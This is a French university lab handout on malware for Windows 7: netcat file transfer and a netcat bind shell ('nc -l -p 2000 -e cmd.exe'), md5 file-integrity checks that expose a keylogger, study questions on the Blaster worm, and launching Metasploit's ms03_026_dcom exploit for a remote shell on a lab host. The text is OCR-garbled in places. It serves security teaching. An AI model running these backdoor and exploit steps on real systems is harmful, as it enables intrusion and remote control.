## Labo Malware (90 min)

| 0            | Introduction                                                                                                    | sudo ./c 2                                                                     |  |  |
|--------------|----------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------|--|--|
|              | Ce travail pratique so                                                                                                    | us Windows 7 comprend les parties suivantes :                                  |  |  |
|              | Netcat                                                                                                    | → §1 – 20 min à effectuer par groupe de 2                                      |  |  |
|              | File Integrity                                                                                                    | $\rightarrow$ §2 – 20 min                                                      |  |  |
|              | <ul> <li>Blaster</li> <li>Metasploit</li> </ul>                                                                                                    | $\rightarrow$ §3 – 35 min<br>$\rightarrow$ 84 – 15 min                         |  |  |
| Action       |                                                                                                    |                                                                                |  |  |
| Action       | Ouvrir une session a                                                                                                    | Ouvrir une session administrateur : compte=albert username=admin               |  |  |
|              | Copier le dossier \\10.2.1.1\doclabo\Secu\Malware sur le bureau                                                                                                    |                                                                                |  |  |
| 1            | Netcat                                                                                                    | 20 min                                                                         |  |  |
| Introduction | Illustrer la notion de porte dérobée <i>(backdoor)</i> avec l'outil <b>netcat</b> qui permet d'établir un canal TCP                                                           |                                                                                |  |  |
|              | ou UDP entre 2 mach                                                                                                    | nines.                                                                         |  |  |
|              | Ce programme comm                                                                                                    | nunique avec l'utilisateur via des mécanismes entrée – sortie classiques       |  |  |
|              | Standard In = Standard     Standard In =                                                                                                    | = le clavier ou un fichier ou la sortie d'une commande (grâce à l'opérateur  ) |  |  |
|              | Standard Ou                                                                                                    | t = la fenêtre cmd.exe ou un fichier ou l'entrée d'une autre commande (grâce   |  |  |
|              | à l'opérateur                                                                                                    |                                                                                |  |  |
|              | • Typer Alt Gr                                                                                                    | 7 pour produire l'opérateur i                                                  |  |  |
| Action       | Dans le dossier Malw                                                                                                    | are, déplacer le dossier tools dans C:∖                                        |  |  |
|              | Dans un Command p                                                                                                    | rompt:cd C:\tools <enter></enter>                                              |  |  |
| But 1.1      | Transfert d'un fichie                                                                                                    | er du PC_D (Droite) au PC_G (Gauche)                                           |  |  |
| Action       | Sur PC_G: nc -                                                                                                    | -l -p 1234 > f2.txt                                                            |  |  |
|              | Sur <b>PC_D</b> : echo<br>nc 1                                                                                                    | abcd > f1.txt<br>IP_PC_G 1234 < f1.txt                                         |  |  |
| Remarque     | Netcat ne coupe pas la connexion automatiquement une fois le transfert terminé.<br>Il est donc nécessaire de l'interrompre manuellement grâce à la combinaison clavier CTRL C |                                                                                |  |  |
| Question 1a  | Que s'est-il passé en exécutant, sur les 2 PC, les commandes mentionnées ci-dessus ?                                                                                          |                                                                                |  |  |
| Question 1b  | Que signifie l'option -                                                                                                    | Que signifie l'option -1 de la commande netcat ?                               |  |  |
| Question 1c  | Que signifie le symbo                                                                                                    | e < après la commande netcat ?                                                 |  |  |
| Question 1d  | Que signifie le symbole > après la commande netcat ?                                                                                                    |                                                                                |  |  |
| Question 1e  | Représenter schématiquement ce transfert                                                                                                    |                                                                                |  |  |
| But 1 2      | Contrôle à distance                                                                                                    | de PC. G                                                                       |  |  |
| But 1.2      |                                                                                                    |                                                                                |  |  |
| Action       | Sur PC_G: nc -<br>Sur PC_D: nc :<br>ipco                                                                                                    | -1 -p 2000 -e cmd.exe<br>IP_PC_G 2000<br>onfig                                 |  |  |
| Question 1f  | Quelle adresse IP ob                                                                                                    | tenez-vous ?                                                                   |  |  |
| Action       | Sur PC D: del                                                                                                    | f2.txt                                                                         |  |  |
| -            | CTR                                                                                                    | L C pour interrompre la connexion                                              |  |  |
|              | Sur <b>PC_G</b> : Cont                                                                                                    | rôler que le fichier f2.txt a bien disparu                                     |  |  |
| Question 1g  | Représenter schématiquement ce contrôle à distance                                                                                                    |                                                                                |  |  |

| Test        | Contrôler avec <b>whoami /all</b> que le PC Client possède un jeton complet si la commande no est exécutée dans un cmd avec Run as administrator |                                                                                                    |
|-------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|
| But 1.3     | Rediriger la sortie d'un exécutable sur netcat                                                                                                   |                                                                                                    |
| Action      | Sur <b>PC_G</b> :<br>Sur <b>PC_D</b> :<br>Sur <b>PC_D</b> :<br>Sur <b>PC_G</b> :                                                                 | nc -l -p 3000 > result.txt<br>ipconfig   nc IP_PC_G 3000<br>CTRL C pour interrompre la connexion<br>ouvrir le fichier result.txt |
| Question 1h | Représenter schématiquement cette redirection                                                                                                    |                                                                                                    |
| Question 1i | Pourquoi netcat                                                                                                    | t fait partie de la catégorie des backdoors ?                                                                                    |

| 2           | File Integrity 20 min                                                                                                    |  |
|-------------|----------------------------------------------------------------------------------------------------|--|
| But 2.1     | Générer le fichier de référence contenant la liste des <i>hashes</i> md5 des fichiers contenus dans l<br>répertoire C:\Windows\System32 |  |
| Action      | Dans un Command Prompt<br>cd C:\tools<br>md5deep C:\Windows\System32\* > ref.md5                                                        |  |
| But 2.2     | Installer le jeu illusion                                                                                                    |  |
| Action      | Dans C:\tools, clic-droit sur illusion.exe puis Run as Administrator                                                                    |  |
| Question 2a | Que se passe-t-il ?                                                                                                    |  |
|             |                                                                                                    |  |
| But 2.3     | Typer quelques commandes                                                                                                    |  |
| Action      | Dans un Command Prompt, typer les commandes date <enter> ver<enter></enter></enter>                                                     |  |
|             |                                                                                                    |  |
| But 2.4     | Investiguer pour trouver des éléments anormaux                                                                                          |  |
| Action      | Constater la présence du fichier C:\key.log<br>Effectuer un clic droit sur ce fichier – <i>Properties</i>                               |  |
| Question 2b | Quand ce fichier a-t-il été créé ?                                                                                                    |  |
| Action      | Essayer d'ouvrir ce fichier                                                                                                    |  |
| Question 2c | Le fichier peut-il être ouvert ?                                                                                                    |  |
| Action      | CTRL + SHIFT + Esc pour démarrer Task Manager<br>Onglet Processes                                                                       |  |
| Question 2d | Quel processus semble douteux ?                                                                                                    |  |

| Action      | Terminer ce processus (sélectionner le processus puis – <i>End Process</i> )<br>Tenter à nouveau d'ouvrir le fichier c:\key.log                                                                                                    |  |  |
|-------------|----------------------------------------------------------------------------------------------------|--|--|
| Question 2e | Que contient ce fichier ?                                                                                                    |  |  |
| Question 2f | Qu'en déduisez-vous ?                                                                                                    |  |  |
| But 2.5     | Générer le fichier contenant la liste des <i>hashes</i> md5 des fichiers contenus dans le répertoire C:\Windows\System32                                                                                                    |  |  |
| Action      | md5deep C:\Windows\System32\* > new.md5<br>Ouvrir le fichier généré avec wordpad                                                                                                    |  |  |
| But 2.6     | Comparer ce fichier avec celui produit au §2.1                                                                                                    |  |  |
| Action      | Dans un Command Prompt<br>cd C:\tools\<br>diff ref.md5 new.md5<br>c:\tools>diff ref.md5 new.md5<br>1149a1150<br>> 74c1005efecc79c37a7a36c09bf520af c:\Windows\system32\kl.exe<br>1152a1154<br>> 3b57f3e4bb251b702be10b1ff7f59ea6 c:\Windows\system32\koffka.exe |  |  |

**Commentaires** La commande diff compare 2 fichiers Première ligne : Premier nombre = 1149 = numéro de ligne dans ref.md5 Lettre a pour ligne ajoutée Dernier nombre = 1150 = numéro de ligne dans new.md5

Question 2g Quelles sont les différences entre ces deux listes ?

| 3           | Blaster                                                                                                    |  |
|-------------|----------------------------------------------------------------------------------------------------|--|
|             | Déterminer le mode opératoire du ver Blaster qui comprend 2 étapes                                                                                                    |  |
| Etape 1     | une machine A infectée tente d'infecter d'autres machines 15 min                                                                                                    |  |
| But 3.1     | Etudier la procédure infectTarget qui démarre en 00401929<br>Rechercher les précieux commentaires ajoutés par la société eEye dans leur étude de type <i>reverse</i><br><i>engineering</i> |  |
| Action      | Ouvrir le document <b>Blaster_Analysis.txt</b> (fenêtre de partage)<br>Répondre aux questions en étudiant les commentaires                                                                 |  |
| Question 3a | D'où provient le code hexadécimal placé en 004040C0 (bindstr) ?                                                                                                    |  |
| Question 3b | A quoi sert-il ?                                                                                                    |  |
| Question 3c | Quel est le canal utilisé pour accéder à distance au shell ?                                                                                                    |  |
| Question 3d | Comment le ver Blaster est-il copié sur le poste de la victime ?                                                                                                    |  |
| Etape 2     | exécution de mblast.exe (code 00401250-00402157) 20 min                                                                                                    |  |
| But 3.2     | Etudier l'exécution de msblast.exe (code 00401250-00402157)<br>Répondre aux questions en étudiant les commentaires                                                                         |  |
| Question 3e | Quelle valeur ce ver écrit-il dans la clé HKLM\Software\Microsoft\Windows\CurrentVersion\Run ?                                                                                             |  |
| Question 3f | Pourquoi ?                                                                                                    |  |
| Question 3g | A quoi sert le mutex appelé BILLY ?                                                                                                    |  |
| Question 3h | A quoi sert le code qui démarre en 00401315 ?                                                                                                    |  |
| Question 3i | A quoi sert le code qui démarre en 00401330 ?                                                                                                    |  |
| Question 3j | A quoi sert le code qui démarre en 004014FC ?                                                                                                    |  |
| Question 3k | A quelle adresse démarre la tentative d'infection sur d'autres victimes ?                                                                                                    |  |
| Question 3I | Combien de victimes peuvent être atteintes simultanément ?                                                                                                    |  |

| 4           | Metasploit 15 min                                                                                                    |  |  |
|-------------|----------------------------------------------------------------------------------------------------|--|--|
| Objectif    | Utiliser ce précieux outil GUI développé par le célèbre H D Moore                                                                                                    |  |  |
| Action      | <ul> <li>Lancer Metasploit 3 GUI (raccourci bureau)</li> <li>Dans le champ d'entrée texte en haut de la fenêtre, taper dcom puis clic sur le bouton Rechercher</li> <li>Clic-droit sur l'exploit ms03_026_dcom – Exécuter</li> <li>Spécifier le système d'exploitation de la cible (ici 1 seul choix possible) – Avancer</li> <li>Sélectionner le <i>payload</i> à utiliser, ici le but est d'avoir un <i>remote command shell</i>, le <i>payload</i> proposé par défaut convient bien (remarquer l'explication en bas de chaque <i>payload</i>) – Avancer</li> <li>Dans le champ <i>RHOST : The target address</i> mettre 10.2.1.5</li> <li>Consulter les différentes options possibles, mais ne pas les modifier</li> <li>Avancer</li> </ul> Un résumé des choix est alors présenté, pour lancer l'exploit clic sur Appliquer Revenir dans la fenêtre principale GUI de Metasploit Dans la fenêtre <i>Sessions</i> en bas à droite, double-clic sur 10.2.1.5 |  |  |
| Question 4a | Qu'obtenez-vous ?                                                                                                    |  |  |
| Remarque    | Il n'y a pas de curseur dans cette fenêtre, simplement exécuter les commandes suivantes                                                                                                    |  |  |
| Question 4b | Quelle réponse obtenez-vous à la commande C:\>ipconfig /all                                                                                                    |  |  |
| Question 4c | Utiliser C:\>netstat /an pour préciser les sockets utilisés avec le remote command shell?                                                                                                    |  |  |
| Question 4d | Où retrouvez-vous dans Metasploit le port 4444 de la machine cible (éventuellement refaire les manipulations précédentes) ?                                                                                                    |  |  |
| Question 4e | Quelle réponse obtenez-vous à la commande C:\>whoami /all                                                                                                    |  |  |
| Question 4f | Quel est le compte avec lequel s'exécutent les commandes dans le remote command shell ?                                                                                                    |  |  |
| 5           | Complément optionnel                                                                                                    |  |  |
| Objectif    | Déterminer le payload envoyé par Metasploit au 4 avec Wireshark                                                                                                    |  |  |

Etudier la commande netstat à partir de l'aide

Etudier l'implémentation du keylogger utilisé au §2 → <u>http://www.tdeig.ch/windows/solleder\_M.pdf pages 44-47</u>

Recherche d'autres possibilités de la commande netcat utilisée au §1 → Utiliser SANS\_netcat.pdf et Tutorial.pdf (situés dans le dossier copié)

Parcourir le rapport Udriot qui met en œuvre des attaques à partir de la distribution kali